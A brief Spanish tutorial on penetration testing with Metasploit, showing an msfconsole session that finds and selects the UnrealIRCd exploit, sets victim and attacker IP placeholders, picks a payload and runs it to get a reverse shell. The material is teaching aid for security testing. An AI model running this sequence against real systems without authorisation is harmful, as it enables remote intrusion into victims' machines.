Software para pentesting (penetration testing).

• Web oficial

Ejemplo de una sesión con mfsconsole:

Búsqueda en la base de datos de Metasploit para encontrar vulnerabilidades y exploits:

search unrealirc

Información sobre el resultado encontrado:

info 0

Seleccionar el exploit:

use 0

Configuramos opciones del equipo víctima:

set RHOSTS <IP_VICTIMA>

Mostramos payloads:

show payloads

Elegimos un payload (el 9 en este caso):

set payload 9

Configuramos una shell inversa en el equipo atacante:

set LHOST <IP_ATACANTE>

Con el comando options se pueden ver las configuraciones establecidas para el módulo de metasploit

Ejecutamos el payload:

run